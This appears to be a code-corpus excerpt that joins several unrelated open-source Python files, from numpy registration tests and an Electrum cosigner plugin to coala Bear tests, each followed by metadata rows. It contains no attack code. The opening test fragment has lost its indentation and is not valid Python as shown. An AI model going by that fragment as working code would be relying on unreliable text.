def test2a(self):
a = numpy.zeros((20,11,12), dtype=int)
a_off = numpy.zeros((len(a), a.ndim-1), dtype=int)
a[:, 3:-4, 3:-4] = 1
a[10] = 0
a[10, :-7, :-7] = 1
a_off[10] = a.shape[1:]
a_off[10] -= 3
numpy.negative(a_off, out=a_off)
am = a.mean(axis=0)
af = numpy.fft.fftn(a, axes=range(1, a.ndim))
amf = numpy.fft.fftn(am, axes=range(am.ndim))
a_off2 = nanshe.imp.registration.find_offsets(af, amf)
assert (a_off2.dtype == a_off.dtype)
assert (a_off2 == a_off).all()
@nose.plugins.attrib.attr("3D")
def test0b(self):
a = numpy.zeros((20,10,11,12), dtype=int)
a_off = numpy.zeros((len(a), a.ndim-1), dtype=int)
a[:, 3:-3, 3:-3, 3:-3] = 1
am = a.mean(axis=0)
af = numpy.fft.fftn(a, axes=range(1, a.ndim))
amf = numpy.fft.fftn(am, axes=range(am.ndim))
a_off2 = nanshe.imp.registration.find_offsets(af, amf)
assert (a_off2.dtype == a_off.dtype)
assert (a_off2 == a_off).all()
@nose.plugins.attrib.attr("3D")
def test1b(self):
a = numpy.zeros((20,10,11,12), dtype=int)
a_off = numpy.zeros((len(a), a.ndim-1), dtype=int)
a[:, 3:-3, 3:-3, 3:-3] = 1
a[10] = 0
a[10, :-6, :-6, :-6] = 1
a_off[10] = a.shape[1:]
a_off[10] -= 3
numpy.negative(a_off, out=a_off)
am = a.mean(axis=0)
af = numpy.fft.fftn(a, axes=range(1, a.ndim))
amf = numpy.fft.fftn(am, axes=range(am.ndim))
a_off2 = nanshe.imp.registration.find_offsets(af, amf)
assert (a_off2.dtype == a_off.dtype)
assert (a_off2 == a_off).all()
@nose.plugins.attrib.attr("3D")
def test2b(self):
a = numpy.zeros((20,11,12,13), dtype=int)
a_off = numpy.zeros((len(a), a.ndim-1), dtype=int)
a[:, 3:-4, 3:-4, 3:-4] = 1
a[10] = 0
a[10, :-7, :-7, :-7] = 1
a_off[10] = a.shape[1:]
a_off[10] -= 3
numpy.negative(a_off, out=a_off)
am = a.mean(axis=0)
af = numpy.fft.fftn(a, axes=range(1, a.ndim))
amf = numpy.fft.fftn(am, axes=range(am.ndim))
a_off2 = nanshe.imp.registration.find_offsets(af, amf)
assert (a_off2.dtype == a_off.dtype)
assert (a_off2 == a_off).all()
| bsd-3-clause | -677,713,587,896,744,800 | 24.214885 | 71 | 0.476491 | false |
gary-pickens/HouseMonitor | housemonitor/lib/waitforsystemtime.py | 1 | 1545 | '''
Created on Dec 14, 2013
@author: gary
'''
from datetime import datetime
import time
class WaitForSystemTime( object ):
'''
When HouseMonitor is starting at boot time, the NTP (Network
Time Protocol) has not set the time yet. This class delays
the start until the system time has been set.
'''
HOUSEMONITOR_EPOCH_TIME = datetime( 2012, 9, 10, 0, 0, 0 )
WAIT_FOR_SYSTEM_TIME = 15
def __init__( self, sleep=time.sleep ):
'''
Initialize WaitForSystemTime.
:param sleep: For unit test. Used for injecting a mock sleep.
        :type sleep: function
'''
super( WaitForSystemTime, self ).__init__()
self.sleep = sleep
def validSystemTime( self, now=datetime.now() ):
'''
        Test whether the system time has been set. When first booted it is
        set to the UNIX epoch (January 1, 1970). After NTP has set the
        time, it is later than the HouseMonitor epoch time (Sept 10, 2012).
:param now: For unit test. Used for injecting a mock now.
        :type now: datetime
'''
if ( now < self.HOUSEMONITOR_EPOCH_TIME ):
print( 'waiting for system time to be set: {}'.format( now ) )
self.sleep( self.WAIT_FOR_SYSTEM_TIME )
return False
else:
return True
def wait( self ):
'''
Wait for system time to be set.
'''
valid_system_time = False
while not valid_system_time:
valid_system_time = self.validSystemTime( datetime.now() )
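# Usage sketch (illustrative only, not part of the original module).  At boot
# HouseMonitor would block on wait() before starting the rest of the system;
# the fake sleep injected below is an assumption so the example never blocks.
if __name__ == '__main__':
    def _fake_sleep( seconds ):
        # Stand-in for time.sleep; just reports what would have happened.
        print( 'would sleep {} seconds waiting for NTP'.format( seconds ) )
    waiter = WaitForSystemTime( sleep=_fake_sleep )
    waiter.wait()
    print( 'system time is set; HouseMonitor can start' )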
| mit | -6,216,288,742,393,243,000 | 27.090909 | 74 | 0.594175 | false |
prmtl/fuel-web | fuel_agent_ci/fuel_agent_ci/drivers/fabric_driver.py | 4 | 4071 | # Copyright 2014 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
import sys
import tempfile
from fabric import api as fab
LOG = logging.getLogger(__name__)
def ssh_status(ssh):
LOG.debug('Trying to get ssh status')
with fab.settings(
host_string=ssh.host,
user=ssh.user,
key_filename=os.path.join(ssh.env.envdir, ssh.key_filename),
timeout=ssh.connection_timeout):
try:
with fab.hide('running', 'stdout', 'stderr'):
fab.run('echo')
LOG.debug('Ssh connection is available')
return True
except SystemExit:
sys.exit()
except Exception:
LOG.debug('Ssh connection is not available')
return False
def ssh_put_content(ssh, file_content, remote_filename):
LOG.debug('Trying to put content into remote file: %s' % remote_filename)
with fab.settings(
host_string=ssh.host,
user=ssh.user,
key_filename=os.path.join(ssh.env.envdir, ssh.key_filename),
timeout=ssh.connection_timeout):
with tempfile.NamedTemporaryFile() as f:
f.write(file_content)
try:
fab.put(f.file, remote_filename)
except SystemExit:
sys.exit()
except Exception:
LOG.error('Error while putting content into '
'remote file: %s' % remote_filename)
raise
def ssh_put_file(ssh, filename, remote_filename):
LOG.debug('Trying to put file on remote host: '
'local=%s remote=%s' % (filename, remote_filename))
with fab.settings(
host_string=ssh.host,
user=ssh.user,
key_filename=os.path.join(ssh.env.envdir, ssh.key_filename),
timeout=ssh.connection_timeout):
try:
fab.put(filename, remote_filename)
except SystemExit:
sys.exit()
except Exception:
LOG.error('Error while putting file on remote host: '
'local=%s remote=%s' % (filename, remote_filename))
raise
def ssh_get_file(ssh, remote_filename, filename):
LOG.debug('Trying to get file from remote host: '
'local=%s remote=%s' % (filename, remote_filename))
with fab.settings(
host_string=ssh.host,
user=ssh.user,
key_filename=os.path.join(ssh.env.envdir, ssh.key_filename),
timeout=ssh.connection_timeout):
try:
fab.get(remote_filename, filename)
except SystemExit:
sys.exit()
except Exception:
LOG.error('Error while getting file from remote host: '
'local=%s remote=%s' % (filename, remote_filename))
raise
def ssh_run(ssh, command, command_timeout=10):
LOG.debug('Trying to run command on remote host: %s' % command)
with fab.settings(
host_string=ssh.host,
user=ssh.user,
key_filename=os.path.join(ssh.env.envdir, ssh.key_filename),
timeout=ssh.connection_timeout,
command_timeout=command_timeout,
warn_only=True):
try:
with fab.hide('running', 'stdout', 'stderr'):
return fab.run(command, pty=True)
except SystemExit:
sys.exit()
except Exception:
            LOG.error('Error while running command on remote host: '
                      '%s' % command)
raise
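# Usage sketch (illustrative, not part of the driver).  Each helper expects an
# ssh object exposing host, user, key_filename, connection_timeout and an
# env.envdir attribute; the namedtuple wiring and addresses below are
# assumptions made only for demonstration.
if __name__ == '__main__':
    import collections
    Env = collections.namedtuple('Env', ['envdir'])
    Ssh = collections.namedtuple(
        'Ssh', ['host', 'user', 'key_filename', 'connection_timeout', 'env'])
    ssh = Ssh(host='10.20.0.2', user='root', key_filename='fuel_agent_ci.key',
              connection_timeout=5, env=Env(envdir='/tmp/fuel_agent_ci'))
    if ssh_status(ssh):
        print(ssh_run(ssh, 'uname -a'))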
| apache-2.0 | -4,002,654,429,508,231,000 | 34.094828 | 77 | 0.589781 | false |
mistercrunch/airflow | airflow/contrib/operators/gcs_to_s3.py | 7 | 1631 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""This module is deprecated. Please use `airflow.providers.amazon.aws.transfers.gcs_to_s3`."""
import warnings
from airflow.providers.amazon.aws.transfers.gcs_to_s3 import GCSToS3Operator
warnings.warn(
"This module is deprecated. Please use `airflow.providers.amazon.aws.transfers.gcs_to_s3`.",
DeprecationWarning,
stacklevel=2,
)
class GoogleCloudStorageToS3Operator(GCSToS3Operator):
"""
This class is deprecated. Please use
`airflow.providers.amazon.aws.transfers.gcs_to_s3.GCSToS3Operator`.
"""
def __init__(self, *args, **kwargs):
warnings.warn(
"This class is deprecated. "
"Please use `airflow.providers.amazon.aws.transfers.gcs_to_s3.GCSToS3Operator`.",
DeprecationWarning,
stacklevel=3,
)
super().__init__(*args, **kwargs)
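# Migration sketch (illustrative): new DAGs should import the provider operator
# directly rather than this deprecated shim, e.g.
#   from airflow.providers.amazon.aws.transfers.gcs_to_s3 import GCSToS3Operator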
| apache-2.0 | 5,580,610,664,724,588,000 | 36.068182 | 96 | 0.720417 | false |
danakj/chromium | tools/perf/core/benchmark_finders.py | 14 | 1238 | # Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import imp
import inspect
import os
import sys
from core import perf_benchmark
def GetClassFilePath(clazz):
""" Return the absolute file path to |clazz|. """
assert inspect.isclass(clazz)
path = os.path.abspath(inspect.getfile(clazz))
if path.endswith('.pyc'):
return path[:-1]
return path
def GetBenchmarkNamesForFile(top_level_dir, benchmark_file_dir):
""" Return the list of all benchmark names of benchmarks defined in
|benchmark_file_dir|.
"""
  original_sys_path = sys.path[:]
  top_level_dir = os.path.abspath(top_level_dir)
if top_level_dir not in sys.path:
sys.path.append(top_level_dir)
try:
module = imp.load_source('_tmp_module_name_', benchmark_file_dir)
benchmark_names = []
for _, obj in inspect.getmembers(module):
if (inspect.isclass(obj) and issubclass(obj, perf_benchmark.PerfBenchmark)
and GetClassFilePath(obj) == benchmark_file_dir):
benchmark_names.append(obj.Name())
return sorted(benchmark_names)
finally:
sys.path = original_sys_path
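# Usage sketch (illustrative): list the benchmark names defined in a single
# benchmark file; the checkout-relative paths below are assumptions made only
# for demonstration.
if __name__ == '__main__':
  names = GetBenchmarkNamesForFile(
      'tools/perf', 'tools/perf/benchmarks/dummy_benchmark.py')
  print('\n'.join(names))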
| bsd-3-clause | 1,190,419,418,544,215,000 | 30.74359 | 80 | 0.705977 | false |
valesi/electrum | plugins/cosigner_pool/qt.py | 4 | 6879 | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2014 Thomas Voegtlin
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import socket
import threading
import time
import xmlrpclib
from PyQt4.QtGui import *
from PyQt4.QtCore import *
from electrum import bitcoin, util
from electrum import transaction
from electrum.plugins import BasePlugin, hook
from electrum.i18n import _
from electrum_gui.qt.transaction_dialog import show_transaction
import sys
import traceback
PORT = 12344
HOST = 'ecdsa.net'
server = xmlrpclib.ServerProxy('http://%s:%d'%(HOST,PORT), allow_none=True)
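# Message flow (summarised from the classes below): Plugin.do_send encrypts the
# raw transaction with each cosigner's public key K and uploads it to the pool
# server under Hash(K).  The Listener daemon thread polls server.get() roughly
# every 30 seconds for the key hashes whose master private key this wallet
# holds and emits 'cosigner:receive' when a payload arrives.  Plugin.on_receive
# then decrypts the payload with the matching master private key (asking for
# the wallet password if necessary) and opens the transaction dialog so the
# cosigner can sign.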
class Listener(util.DaemonThread):
def __init__(self, parent):
util.DaemonThread.__init__(self)
self.daemon = True
self.parent = parent
self.received = set()
self.keyhashes = []
def set_keyhashes(self, keyhashes):
self.keyhashes = keyhashes
def clear(self, keyhash):
server.delete(keyhash)
self.received.remove(keyhash)
def run(self):
while self.running:
if not self.keyhashes:
time.sleep(2)
continue
for keyhash in self.keyhashes:
if keyhash in self.received:
continue
try:
message = server.get(keyhash)
except Exception as e:
self.print_error("cannot contact cosigner pool")
time.sleep(30)
continue
if message:
self.received.add(keyhash)
self.print_error("received message for", keyhash)
self.parent.obj.emit(SIGNAL("cosigner:receive"), keyhash,
message)
# poll every 30 seconds
time.sleep(30)
class Plugin(BasePlugin):
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.listener = None
self.obj = QObject()
self.obj.connect(self.obj, SIGNAL('cosigner:receive'), self.on_receive)
self.keys = []
self.cosigner_list = []
@hook
def on_new_window(self, window):
self.update(window)
@hook
def on_close_window(self, window):
self.update(window)
def is_available(self):
return True
def update(self, window):
wallet = window.wallet
if wallet.wallet_type not in ['2of2', '2of3']:
return
if self.listener is None:
self.print_error("starting listener")
self.listener = Listener(self)
self.listener.start()
elif self.listener:
self.print_error("shutting down listener")
self.listener.stop()
self.listener = None
self.keys = []
self.cosigner_list = []
for key, xpub in wallet.master_public_keys.items():
K = bitcoin.deserialize_xkey(xpub)[-1].encode('hex')
_hash = bitcoin.Hash(K).encode('hex')
if wallet.master_private_keys.get(key):
self.keys.append((key, _hash, window))
else:
self.cosigner_list.append((window, xpub, K, _hash))
if self.listener:
self.listener.set_keyhashes([t[1] for t in self.keys])
@hook
def transaction_dialog(self, d):
d.cosigner_send_button = b = QPushButton(_("Send to cosigner"))
b.clicked.connect(lambda: self.do_send(d.tx))
d.buttons.insert(0, b)
self.transaction_dialog_update(d)
@hook
def transaction_dialog_update(self, d):
if d.tx.is_complete() or d.wallet.can_sign(d.tx):
d.cosigner_send_button.hide()
return
for window, xpub, K, _hash in self.cosigner_list:
if window.wallet == d.wallet and self.cosigner_can_sign(d.tx, xpub):
d.cosigner_send_button.show()
break
else:
d.cosigner_send_button.hide()
def cosigner_can_sign(self, tx, cosigner_xpub):
from electrum.transaction import x_to_xpub
xpub_set = set([])
for txin in tx.inputs:
for x_pubkey in txin['x_pubkeys']:
xpub = x_to_xpub(x_pubkey)
if xpub:
xpub_set.add(xpub)
return cosigner_xpub in xpub_set
def do_send(self, tx):
for window, xpub, K, _hash in self.cosigner_list:
if not self.cosigner_can_sign(tx, xpub):
continue
message = bitcoin.encrypt_message(tx.raw, K)
try:
server.put(_hash, message)
except Exception as e:
traceback.print_exc(file=sys.stdout)
window.show_message("Failed to send transaction to cosigning pool.")
return
window.show_message("Your transaction was sent to the cosigning pool.\nOpen your cosigner wallet to retrieve it.")
def on_receive(self, keyhash, message):
self.print_error("signal arrived for", keyhash)
for key, _hash, window in self.keys:
if _hash == keyhash:
break
else:
self.print_error("keyhash not found")
return
wallet = window.wallet
if wallet.use_encryption:
password = window.password_dialog('An encrypted transaction was retrieved from cosigning pool.\nPlease enter your password to decrypt it.')
if not password:
return
else:
password = None
if not window.question(_("An encrypted transaction was retrieved from cosigning pool.\nDo you want to open it now?")):
return
xprv = wallet.get_master_private_key(key, password)
if not xprv:
return
try:
k = bitcoin.deserialize_xkey(xprv)[-1].encode('hex')
EC = bitcoin.EC_KEY(k.decode('hex'))
message = EC.decrypt_message(message)
except Exception as e:
traceback.print_exc(file=sys.stdout)
window.show_message(str(e))
return
self.listener.clear(keyhash)
tx = transaction.Transaction(message)
show_transaction(tx, window, prompt_if_unsaved=True)
| gpl-3.0 | 4,982,712,453,873,649,000 | 32.8867 | 151 | 0.58933 | false |
internap/almanach | tests/auth/test_mixed_auth.py | 1 | 2037 | # Copyright 2016 Internap.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from flexmock import flexmock, flexmock_teardown
from hamcrest import raises, assert_that, calling, equal_to
from almanach.auth.mixed_auth import MixedAuthentication
from almanach.common.exceptions.authentication_failure_exception import AuthenticationFailureException
class MixedAuthenticationTest(unittest.TestCase):
def setUp(self):
self.auth_one = flexmock()
self.auth_two = flexmock()
self.auth_backend = MixedAuthentication([self.auth_one, self.auth_two])
def tearDown(self):
flexmock_teardown()
def test_with_token_valid_with_auth_one(self):
token = "my token"
self.auth_one.should_receive("validate").and_return(True)
assert_that(self.auth_backend.validate(token), equal_to(True))
def test_with_token_valid_with_auth_two(self):
token = "my token"
self.auth_one.should_receive("validate").and_raise(AuthenticationFailureException)
self.auth_two.should_receive("validate").and_return(True)
assert_that(self.auth_backend.validate(token), equal_to(True))
    def test_with_token_invalid_with_both_auths(self):
token = "bad token"
self.auth_one.should_receive("validate").and_raise(AuthenticationFailureException)
self.auth_two.should_receive("validate").and_raise(AuthenticationFailureException)
assert_that(calling(self.auth_backend.validate).with_args(token), raises(AuthenticationFailureException))
| apache-2.0 | -3,238,183,001,054,495,000 | 41.4375 | 113 | 0.735886 | false |
schettino72/nikola | nikola/data/themes/base/messages/messages_hi.py | 6 | 2054 | # -*- encoding:utf-8 -*-
from __future__ import unicode_literals
MESSAGES = {
"%d min remaining to read": "पढ़ने में %d मिनट बाकी",
"(active)": "",
"Also available in:": "उपलब्ध भाषाएँ:",
"Archive": "आर्काइव",
"Categories": "श्रेणियाँ",
"Comments": "टिप्पणियाँ",
"LANGUAGE": "हिन्दी",
"Languages:": "भाषाएँ:",
"More posts about %s": "%s के बारे में अौर पोस्टें",
"Newer posts": "नई पोस्टें",
"Next post": "अगली पोस्ट",
"No posts found.": "कोई पोस्ट नहीं मिल सकी",
"Nothing found.": "कुछ नहीं मिल सका",
"Older posts": "पुरानी पोस्टें",
"Original site": "असली साइट",
"Posted:": "पोस्टेड:",
"Posts about %s": "%s के बारे में पोस्टें",
"Posts for year %s": "साल %s की पोस्टें",
"Posts for {month} {day}, {year}": "{day} {month} {year} की पोस्टें",
"Posts for {month} {year}": "{month} {year} की पोस्टें",
"Previous post": "पिछली पोस्ट",
"Publication date": "प्रकाशन की तारीख",
"RSS feed": "आर एस एस फ़ीड",
"Read in English": "हिन्दी में पढ़िए",
"Read more": "और पढ़िए",
"Skip to main content": "मुख्य सामग्री पर जाएँ",
"Source": "सोर्स",
"Subcategories:": "",
"Tags and Categories": "टैग्स और श्रेणियाँ",
"Tags": "टैग्स",
"Write your page here.": "",
"Write your post here.": "",
"old posts, page %d": "पुरानी पोस्टें, पृष्ठ %d",
"page %d": "पृष्ठ %d",
}
| mit | -8,039,683,895,320,288,000 | 34.641026 | 73 | 0.471942 | false |
coala/coala | tests/bears/BearTest.py | 4 | 31575 | import pdb
import os
from collections import defaultdict
import datetime
from io import BytesIO, StringIO
import multiprocessing
import unittest
from os.path import abspath, exists, isfile, join, getmtime
from tempfile import TemporaryDirectory, NamedTemporaryFile
import shutil
from freezegun import freeze_time
from unittest.mock import patch
import requests
import requests_mock
from coalib.coala_main import run_coala
from coalib.bearlib.aspects.collections import AspectList
from coalib.bearlib.aspects.Metadata import CommitMessage
from coalib.bearlib.languages.Language import Language, Languages
from coalib.bears.Bear import (
Bear, Debugger, _setting_is_enabled, _is_debugged, _is_profiled)
from coalib.bears.BEAR_KIND import BEAR_KIND
from coalib.bears.GlobalBear import GlobalBear
from coalib.bears.LocalBear import LocalBear
from coalib.results.Result import Result
from coalib.results.TextPosition import ZeroOffsetError
from coalib.output.printers.LOG_LEVEL import LOG_LEVEL
from coalib.output.printers.LogPrinter import LogPrinter
from coalib.processes.communication.LogMessage import LogMessage
from coalib.settings.Section import Section
from coalib.settings.Setting import Setting, language
from pyprint.ConsolePrinter import ConsolePrinter
from coala_utils.ContextManagers import prepare_file
from tests.TestUtilities import bear_test_module
class BadTestBear(Bear):
def __init__(self, section, queue):
Bear.__init__(self, section, queue)
@staticmethod
def kind():
return BEAR_KIND.GLOBAL
def run(self):
raise NotImplementedError
class TestBear(Bear):
BEAR_DEPS = {BadTestBear}
def __init__(self, section, queue):
Bear.__init__(self, section, queue)
@staticmethod
def kind():
return BEAR_KIND.GLOBAL
def run(self):
self.print('set', 'up', delimiter='=')
self.err('teardown')
self.err()
class TestOneBear(LocalBear):
def __init__(self, section, queue):
Bear.__init__(self, section, queue)
def run(self, x: int, y: str, z: int = 79, w: str = 'kbc'):
yield 1
yield 2
class TestTwoBear(Bear):
def run(self, *args, **kwargs):
yield 1
yield 2
yield 3
class TestThreeBear(Bear):
def run(self, *args, **kwargs):
pass
class TypedTestBear(Bear):
def __init__(self, section, queue):
Bear.__init__(self, section, queue)
self.was_executed = False
def run(self, something: int):
self.was_executed = True
return []
class ZeroOffsetLocalBear(LocalBear):
def __init__(self, section, queue, error_message):
Bear.__init__(self, section, queue)
self.error_message = error_message
def run(self, filename, file):
raise ZeroOffsetError(self.error_message)
class ZeroOffsetGlobalBear(Bear):
def __init__(self, section, queue, error_message):
Bear.__init__(self, section, queue)
self.error_message = error_message
@staticmethod
def kind():
return BEAR_KIND.GLOBAL
def run(self):
raise ZeroOffsetError(self.error_message)
class BearWithPrerequisites(Bear):
prerequisites_fulfilled = True
def __init__(self, section, queue, prerequisites_fulfilled):
BearWithPrerequisites.prerequisites_fulfilled = prerequisites_fulfilled
Bear.__init__(self, section, queue)
self.was_executed = False
def run(self):
self.was_executed = True
return []
@classmethod
def check_prerequisites(cls):
return cls.prerequisites_fulfilled
class StandAloneBear(Bear):
def run(self, x: int, y: int, z: int = 33):
"""
Test run.
:param x: First value.
:param y: Second value.
:param z: Third value.
"""
yield x
yield y
yield z
class DependentBear(Bear):
BEAR_DEPS = {StandAloneBear}
def run(self, y: int, w: float):
"""
Test run with more params.
:param y: Second value, but better.
:param w: Fourth value.
"""
yield y
yield w
class aspectsTestBear(Bear, aspects={
'detect': [CommitMessage.Shortlog.ColonExistence],
'fix': [CommitMessage.Shortlog.TrailingPeriod],
}, languages=['Python', 'C#']):
pass
class aspectsDetectOnlyTestBear(Bear, aspects={
'detect': [CommitMessage.Shortlog.ColonExistence],
}, languages=['Python']):
pass
class aspectsFixOnlyTestBear(Bear, aspects={
'fix': [CommitMessage.Shortlog.TrailingPeriod],
}, languages=['Python']):
pass
class BearWithLanguage(Bear):
def __init__(self, section, queue):
Bear.__init__(self, section, queue)
@staticmethod
def kind():
return BEAR_KIND.GLOBAL
def run(self, language: language = language('Python 3.4')):
yield language
class BearTestBase(unittest.TestCase):
def setUp(self):
self.queue = multiprocessing.Queue()
self.settings = Section('test_settings')
self.uut = TestBear(self.settings, self.queue)
def tearDown(self):
if exists(self.uut.data_dir):
shutil.rmtree(self.uut.data_dir)
class BearTest(BearTestBase):
def test_languages(self):
self.assertIs(type(aspectsTestBear.languages), Languages)
self.assertIn('Python', aspectsTestBear.languages)
self.assertIn('csharp', aspectsTestBear.languages)
self.assertNotIn('javascript', aspectsTestBear.languages)
def test_default_aspects(self):
assert type(Bear.aspects) is defaultdict
assert type(Bear.aspects['detect']) is AspectList
assert type(Bear.aspects['fix']) is AspectList
assert Bear.aspects['detect'] == Bear.aspects['fix'] == []
def test_no_fix_aspects(self):
assert type(aspectsDetectOnlyTestBear.aspects) is defaultdict
assert type(aspectsDetectOnlyTestBear.aspects['detect']) is AspectList
assert type(aspectsDetectOnlyTestBear.aspects['fix']) is AspectList
assert aspectsDetectOnlyTestBear.aspects['fix'] == []
assert (aspectsDetectOnlyTestBear.aspects['detect'] ==
[CommitMessage.Shortlog.ColonExistence])
assert (CommitMessage.Shortlog.ColonExistence in
aspectsDetectOnlyTestBear.aspects['detect'])
def test_no_detect_aspects(self):
assert type(aspectsFixOnlyTestBear.aspects) is defaultdict
assert type(aspectsFixOnlyTestBear.aspects['detect']) is AspectList
assert type(aspectsFixOnlyTestBear.aspects['fix']) is AspectList
assert aspectsFixOnlyTestBear.aspects['detect'] == []
assert (aspectsFixOnlyTestBear.aspects['fix'] ==
[CommitMessage.Shortlog.TrailingPeriod])
assert (CommitMessage.Shortlog.TrailingPeriod in
aspectsFixOnlyTestBear.aspects['fix'])
def test_detect_and_fix_aspects(self):
assert type(aspectsTestBear.aspects) is defaultdict
assert type(aspectsTestBear.aspects['detect']) is AspectList
assert type(aspectsTestBear.aspects['fix']) is AspectList
assert aspectsTestBear.aspects == {
'detect': [CommitMessage.Shortlog.ColonExistence],
'fix': [CommitMessage.Shortlog.TrailingPeriod],
}
assert (CommitMessage.Shortlog.ColonExistence in
aspectsTestBear.aspects['detect'])
assert (CommitMessage.Shortlog.TrailingPeriod in
aspectsTestBear.aspects['fix'])
def test_simple_api(self):
self.assertRaises(TypeError, TestBear, self.settings, 2)
self.assertRaises(TypeError, TestBear, None, self.queue)
self.assertRaises(NotImplementedError, Bear.kind)
base = Bear(self.settings, None)
self.assertRaises(NotImplementedError, base.run)
self.assertEqual(base.get_non_optional_settings(), {})
def test_message_queue(self):
self.uut.execute()
self.check_message(LOG_LEVEL.DEBUG,
'Running bear TestBear...')
self.check_message(LOG_LEVEL.DEBUG, 'set=up')
self.check_message(LOG_LEVEL.ERROR, 'teardown')
def test_bad_bear(self):
self.uut = BadTestBear(self.settings, self.queue)
self.uut.execute()
self.check_message(LOG_LEVEL.DEBUG)
self.check_message(LOG_LEVEL.ERROR,
'Bear BadTestBear failed to run. Take a look at '
'debug messages (`-V`) for further '
'information.')
        # debug message contains custom content, don't test this here
self.queue.get()
def test_print_filename_LocalBear(self):
self.uut = LocalBear(self.settings, self.queue)
self.uut.execute('filename.py', 'file\n')
self.check_message(LOG_LEVEL.DEBUG)
# Fails because of no run() implementation
self.check_message(LOG_LEVEL.ERROR,
'Bear LocalBear failed to run on file filename.py. '
'Take a look at debug messages (`-V`) for further '
'information.')
def test_print_no_filename_GlobalBear(self):
self.uut = GlobalBear(None, self.settings, self.queue)
self.uut.execute()
self.check_message(LOG_LEVEL.DEBUG)
# Fails because of no run() implementation
self.check_message(LOG_LEVEL.ERROR,
'Bear GlobalBear failed to run. Take a look at '
'debug messages (`-V`) for further '
'information.')
def test_zero_line_offset_LocalBear(self):
error_message = 'Line offset cannot be zero.'
self.uut = ZeroOffsetLocalBear(self.settings,
self.queue,
error_message)
self.uut.execute('filename.py', 'file\n')
self.check_message(LOG_LEVEL.DEBUG)
self.check_message(LOG_LEVEL.ERROR,
'Bear ZeroOffsetLocalBear violated one-based '
'offset convention.', error_message)
def test_zero_column_offset_LocalBear(self):
error_message = 'Column offset cannot be zero.'
self.uut = ZeroOffsetLocalBear(self.settings,
self.queue,
error_message)
self.uut.execute('filename.py', 'file\n')
self.check_message(LOG_LEVEL.DEBUG)
self.check_message(LOG_LEVEL.ERROR,
'Bear ZeroOffsetLocalBear violated one-based '
'offset convention.', error_message)
def test_zero_line_and_column_offset_LocalBear(self):
error_message = 'Line and column offset cannot be zero.'
self.uut = ZeroOffsetLocalBear(self.settings,
self.queue,
error_message)
self.uut.execute('filename.py', 'file\n')
self.check_message(LOG_LEVEL.DEBUG)
self.check_message(LOG_LEVEL.ERROR,
'Bear ZeroOffsetLocalBear violated one-based '
'offset convention.', error_message)
def test_zero_line_offset_GlobalBear(self):
error_message = 'Line offset cannot be zero.'
self.uut = ZeroOffsetGlobalBear(self.settings,
self.queue,
error_message)
self.uut.execute()
self.check_message(LOG_LEVEL.DEBUG)
self.check_message(LOG_LEVEL.ERROR,
'Bear ZeroOffsetGlobalBear violated one-based '
'offset convention.', error_message)
def test_zero_column_offset_GlobalBear(self):
error_message = 'Column offset cannot be zero.'
self.uut = ZeroOffsetGlobalBear(self.settings,
self.queue,
error_message)
self.uut.execute()
self.check_message(LOG_LEVEL.DEBUG)
self.check_message(LOG_LEVEL.ERROR,
'Bear ZeroOffsetGlobalBear violated one-based '
'offset convention.', error_message)
def test_zero_line_and_column_offset_GlobalBear(self):
error_message = 'Line and column offset cannot be zero.'
self.uut = ZeroOffsetGlobalBear(self.settings,
self.queue,
error_message)
self.uut.execute()
self.check_message(LOG_LEVEL.DEBUG)
self.check_message(LOG_LEVEL.ERROR,
'Bear ZeroOffsetGlobalBear violated one-based '
'offset convention.', error_message)
def test_inconvertible(self):
self.uut = TypedTestBear(self.settings, self.queue)
self.settings.append(Setting('something', '5'))
self.uut.execute()
self.check_message(LOG_LEVEL.DEBUG)
self.assertTrue(self.uut.was_executed)
self.settings.append(Setting('something', 'nonsense'))
self.uut.was_executed = False
self.uut.execute()
self.check_message(LOG_LEVEL.DEBUG)
self.check_message(LOG_LEVEL.WARNING)
self.assertTrue(self.queue.empty())
self.assertFalse(self.uut.was_executed)
def check_message(self, log_level, message=None, regex=False):
msg = self.queue.get()
self.assertIsInstance(msg, LogMessage)
if message:
if regex:
self.assertRegexpMatches(msg.message, message)
else:
self.assertEqual(msg.message, message)
self.assertEqual(msg.log_level, log_level, msg)
def test_no_queue(self):
uut = TestBear(self.settings, None)
uut.execute() # No exceptions
def test_dependencies(self):
self.assertEqual(Bear.BEAR_DEPS, set())
self.assertEqual(Bear.missing_dependencies([]), set())
self.assertEqual(Bear.missing_dependencies([BadTestBear]), set())
self.assertEqual(TestBear.missing_dependencies([]), {BadTestBear})
self.assertEqual(TestBear.missing_dependencies([BadTestBear]), set())
self.assertEqual(TestBear.missing_dependencies([TestBear]),
{BadTestBear})
